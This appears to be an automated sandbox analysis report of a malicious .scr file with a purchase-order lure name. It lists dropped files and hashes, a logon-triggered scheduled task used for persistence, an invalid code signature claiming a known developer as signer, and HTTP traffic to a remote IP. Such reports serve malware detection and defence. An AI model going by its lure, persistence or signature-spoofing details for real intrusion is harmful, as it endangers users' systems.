                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i\\...........!.....Z...................p.....a................................Q/........ .......................... ......H.... .......................0...3...................................................................................text....X.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                                            Process:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:modified
                                                                                                            Size (bytes):1574
                                                                                                            Entropy (8bit):5.103162941344142
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtyMxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                                            MD5:EC55073DC549118EB16DDA29B1167B10
                                                                                                            SHA1:3FC157556C89218660E90B3855DC7D57BE2159A7
                                                                                                            SHA-256:4E47B2EFA9489766775B7EAFABC6F9BF199861656DD4522937D457BA354F67FD
                                                                                                            SHA-512:223BE1461FB0BDA9318ED811B46DC8B0B12ED00F221193C7458DD95D2BC795CF8702B52CA750B366012F54C375A163A593B5816DEA4A82DAFB463032B1F5FA53
                                                                                                            Malicious:true
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                            Process:C:\Users\user\AppData\Roaming\PEJmengI.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1574
                                                                                                            Entropy (8bit):5.103162941344142
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtyMxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                                            MD5:EC55073DC549118EB16DDA29B1167B10
                                                                                                            SHA1:3FC157556C89218660E90B3855DC7D57BE2159A7
                                                                                                            SHA-256:4E47B2EFA9489766775B7EAFABC6F9BF199861656DD4522937D457BA354F67FD
                                                                                                            SHA-512:223BE1461FB0BDA9318ED811B46DC8B0B12ED00F221193C7458DD95D2BC795CF8702B52CA750B366012F54C375A163A593B5816DEA4A82DAFB463032B1F5FA53
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):878088
                                                                                                            Entropy (8bit):7.714415066572313
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:tjlIhSPd+ppZbvbe3w/IWZin88Dckr0hD:tjl+SPspnzOUaQM0hD
                                                                                                            MD5:BC03B7D0CC3FAA356F5C49609D150B44
                                                                                                            SHA1:687546140C750B9B466F8DA86C63CFF613B727A2
                                                                                                            SHA-256:36389326C697D43ECF27B181B4EC997FFC45AA8B1CDCA0CCA34DB3D43075CCCD
                                                                                                            SHA-512:53E3C8DDA203BC230E3386222AC6904AACE2526082CD0279301C4BFE953D93FE94D9E2D0C4E8596EB26815CB9642E9A9EC53A1FA63CCF7267B00A93B8998FC7F
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0......&.......&... ...@....@.. ....................................@..................................&..O....@..("...........0...6........................................................... ............... ..H............text........ ...................... ..`.rsrc...("...@...$..................@..@.reloc..............................@..B.................&......H.......d1...!...........S..x............................................0...........(........}.....s....}.....r...p(....}.....~.... ....s....}.....{....o.... ......o......{.....o......{....o.....{....o......{.....{....o.....*f........s ...s!...("....*~..{....r...po......{....o#....*.0..}.........{....r9..po......+7...{.....|....o$...}....(%....{....o&.....{.....o........+.&..{....rS..po........&..{....rS..po........*...........>P..........>f.........}.....('.......s....}....
                                                                                                            Process:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.714415066572313
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:RFQ_P.O.1212024.scr
                                                                                                            File size:878'088 bytes
                                                                                                            MD5:bc03b7d0cc3faa356f5c49609d150b44
                                                                                                            SHA1:687546140c750b9b466f8da86c63cff613b727a2
                                                                                                            SHA256:36389326c697d43ecf27b181b4ec997ffc45aa8b1cdca0cca34db3d43075cccd
                                                                                                            SHA512:53e3c8dda203bc230e3386222ac6904aace2526082cd0279301c4bfe953d93fe94d9e2d0c4e8596eb26815cb9642e9a9ec53a1fa63ccf7267b00a93b8998fc7f
                                                                                                            SSDEEP:24576:tjlIhSPd+ppZbvbe3w/IWZin88Dckr0hD:tjl+SPspnzOUaQM0hD
                                                                                                            TLSH:8B15D0C03B2A7711DEACB934852AEDBC62642E74B004B8F36EDD2B57B5DD1126A1CF40
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0......&.......&... ...@....@.. ....................................@................................
                                                                                                            Icon Hash:37cb832923934d33
                                                                                                            Entrypoint:0x4d26da
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x675A8E02 [Thu Dec 12 07:17:22 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Signature Valid:false
                                                                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                            Error Number:-2146869232
                                                                                                            Not Before, Not After
                                                                                                            • Not Before: 11/12/2018 7:00:00 PM, Not After: 11/8/2021 6:59:59 PM
                                                                                                            Subject Chain
                                                                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd2688 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x2228 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd3000 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd06e0 | 0xd0800 | 5ae1cf6bf2e56edbb38ec95a0f381c87 | False | 0.8905629402727818 | data | 7.712122709503229 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd4000 | 0x2228 | 0x2400 | e0a077bcdf1b6f79b9f95120bc70eeb5 | False | 0.8843315972222222 | data | 7.384538685460378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd8000 | 0xc | 0x200 | 63621867cbe67ee2f67b562d8d00aa54 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd40c8 | 0x1e1f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9939048113085203
RT_GROUP_ICON | 0xd5ef8 | 0x14 | data | | | 1.05
RT_VERSION | 0xd5f1c | 0x308 | data | | | 0.45618556701030927

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Dec 12, 2024 10:20:22.270401001 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.270416975 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.270697117 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.278836012 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.278850079 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.279330969 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.287117958 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.287215948 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.287377119 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.287642956 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.295474052 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.295773983 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.295842886 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.296070099 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.304358006 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.304374933 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.304805994 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.312186956 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.312201977 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.312298059 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.320580959 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.320811987 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.321057081 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.330127001 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.330315113 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.330498934 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.330554008 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.338958979 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.338988066 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.339061975 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.345674992 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.345690012 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.345773935 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.458261013 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.458277941 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.458395004 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.461952925 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.461990118 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.462063074 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.471175909 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.471445084 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.471504927 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.477417946 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.477492094 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.477552891 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.484529018 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.484749079 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.484823942 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.494043112 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.494060993 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.494112015 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.499847889 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.500109911 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.500174999 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.507778883 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.507800102 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.507857084 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.515301943 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.515326977 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.515495062 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.522866011 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.522918940 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.523185015 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.530492067 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.530505896 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.530812979 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.536614895 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.536906004 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.537070990 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.542833090 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.542965889 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.543023109 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.549096107 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.549352884 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.549418926 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.555367947 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.555603981 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.555870056 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.561650038 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.561969042 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.562113047 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.567989111 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.568005085 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.568103075 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.574162960 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.574289083 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.574347019 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.580219984 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.580368996 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.580424070 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.650360107 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.650414944 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.650557995 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.653037071 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.653209925 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.653371096 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.654568911 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.657361031 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.657434940 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.657478094 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.657526970 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.663115978 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.663229942 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.663284063 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.668741941 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.668862104 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.668904066 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.674418926 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.674680948 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.674747944 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.679778099 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.680181980 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.680239916 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.685009003 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.685117006 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.685173988 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.690388918 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.690402031 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.690469980 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.695368052 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.695382118 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.695444107 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.699749947 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.700690985 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.700738907 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.706944942 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.706958055 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.707046032 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.708973885 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.708985090 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.709016085 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.709033012 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.713165045 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.713195086 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.713387012 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.717497110 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.717557907 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.717706919 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.721752882 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.721963882 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.722050905 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.726068974 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.726247072 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.726306915 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.730407953 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.730576992 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.730740070 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.734833956 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.734960079 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.734966993 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.735014915 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.739101887 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.739233971 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.739284039 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.743561983 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.743659019 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.743709087 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:22.747788906 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.747942924 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:22.747992039 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.028086901 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.028125048 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.028259993 CET804916645.33.6.223192.168.2.22
